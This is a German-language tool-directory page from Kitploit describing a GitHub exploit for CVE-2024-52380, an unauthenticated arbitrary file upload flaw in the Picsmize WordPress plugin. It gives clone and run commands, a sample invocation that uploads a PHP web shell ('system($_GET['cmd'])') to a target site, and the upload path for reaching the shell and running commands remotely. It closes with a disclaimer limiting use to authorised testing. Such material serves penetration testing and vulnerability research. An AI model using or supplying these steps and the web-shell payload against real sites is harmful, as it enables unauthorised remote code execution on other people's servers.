Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-52380-Exploit — Das Picsmize-Plugin für WordPress ist anfällig für willkürliche Datei-Uploads. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-52380-exploit
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

Das Picsmize-Plugin für WordPress ist anfällig für willkürliche Datei-Uploads.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-52380-Exploit

Das Picsmize-Plugin für WordPress ist anfällig für beliebige Datei-Uploads.

Beschreibung

Dieses Skript nutzt eine Sicherheitslücke (CVE-2024-52380) im Picsmize-Plugin für WordPress aus, die es nicht authentifizierten Angreifern ermöglicht, beliebige Dateien hochzuladen. Diese Schwachstelle existiert in allen Versionen von Picsmize bis einschließlich 1.0.0. Die Ausnutzung dieser Schwachstelle kann zu einer Remote-Codeausführung auf dem Zielserver führen.

🌟 Funktionen

  • Plugin-Version prüfen: Überprüft automatisch, ob die Ziel-Website eine anfällige Version des Picsmize-Plugins verwendet.
  • Datei-Upload-Exploit: Lädt beliebige PHP-Nutzlasten auf den Zielserver hoch, falls die Website anfällig ist.
  • Kommandozeilenschnittstelle: Einfach zu bedienende CLI zur Angabe von Ziel-URLs und Nutzlasten.

📖 Schwachstellendetails

  • Plugin-Name: Picsmize
  • Betroffene Versionen: Alle Versionen ≤ 1.0.0
  • Schwachstellentyp: Nicht authentifizierter beliebiger Datei-Upload
  • CVE-ID: CVE-2024-52380

🚀 Verwendungshinweise

Voraussetzungen

  • Python 3.7 oder höher
  • requests-Bibliothek (pip install requests)

Skript ausführen

  1. Repository klonen:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    

Verwendung -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

Beispiel

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

Befehlszeilenargumente

Das Skript bietet zwei Befehlszeilenargumente zur einfachen Verwendung:

  1. -u / --url (erforderlich):

    • Zweck: Gibt die Basis-URL der Ziel-WordPress-Website an.
    • Beispiel:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (optional):

    • Zweck: Legt den Inhalt der hochzuladenden PHP-Nutzlast fest.
    • Standardwert:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • Beispiel:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 Datei-Upload-Pfad

Erklärung:

  • /wordpress: Stammverzeichnis der WordPress-Website.
  • wp-content/uploads: Standardverzeichnis für Medien-Uploads in WordPress.
  • 2025/01: Die Verzeichnisstruktur entspricht dem Jahr (2025) und Monat (Januar) basierend auf der Datumskonfiguration des Servers.

Zugriff auf die hochgeladene Datei:

  1. Nach einem erfolgreichen Upload navigieren Sie zur Datei über die vollständige URL. Beispiel:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ Haftungsausschluss

Dieses Skript ist nur für Bildungszwecke und autorisierte Sicherheitstests gedacht. Die unbefugte Nutzung dieses Tools gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Berechtigung zum Testen haben, ist illegal und unethisch.

Tool herunterladen